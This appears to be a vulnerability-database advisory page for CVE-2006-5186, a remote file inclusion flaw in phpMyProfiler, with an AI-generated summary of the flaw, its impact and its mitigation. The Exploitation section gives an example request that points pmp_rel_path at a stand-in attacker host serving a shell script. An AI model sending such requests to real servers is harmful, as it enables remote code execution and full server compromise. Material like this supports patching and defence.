VYPR
Unrated severityNVD Advisory· Published Oct 10, 2006· Updated Apr 23, 2026

CVE-2006-5186

CVE-2006-5186

Description

PHP remote file inclusion in phpMyProfiler 0.9.6 and earlier via the pmp_rel_path parameter, allowing arbitrary code execution when register_globals is enabled.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

PHP remote file inclusion in phpMyProfiler 0.9.6 and earlier via the pmp_rel_path parameter, allowing arbitrary code execution when register_globals is enabled.

Vulnerability

PHP remote file inclusion vulnerability exists in functions.php of phpMyProfiler 0.9.6 and earlier. The application unsafely uses the $pmp_rel_path parameter in a require_once() call without proper sanitization. When the PHP configuration directive register_globals is enabled, an attacker can supply a remote URL in the pmp_rel_path parameter, causing the server to include and execute arbitrary PHP code from a remote location [1][2].

Exploitation

An attacker needs only network access to the vulnerable server and the ability to craft an HTTP request. No authentication is required. The exploitation step is straightforward: send a GET or POST request to functions.php with the pmp_rel_path parameter set to a URL pointing to an attacker-controlled PHP script (e.g., http://site.com/[path]/functions.php?pmp_rel_path=http://evil.com/shell.txt). The server will include and execute the remote code [2].

Impact

Successful exploitation allows remote attackers to execute arbitrary PHP code on the target server. This results in complete compromise of the confidentiality, integrity, and availability of the application and potentially the underlying server, depending on the permissions of the web server process. The attacker can read, write, or delete files, execute system commands, access databases, and pivot to other systems on the same network.

Mitigation

No official patch has been released for this vulnerability; it affects phpMyProfiler 0.9.6 and earlier. The primary mitigation is to disable register_globals in php.ini (set to Off). Additionally, users should consider upgrading to a later version if available, or removing the application entirely if unsupported. This CVE is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog.

AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • cpe:2.3:a:phpmyprofiler:phpmyprofiler:*:*:*:*:*:*:*:*+ 1 more
    • cpe:2.3:a:phpmyprofiler:phpmyprofiler:*:*:*:*:*:*:*:*range: <=0.9.6
    • (no CPE)range: <=0.9.6

Patches

0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

10

News mentions

0

No linked articles in our index yet.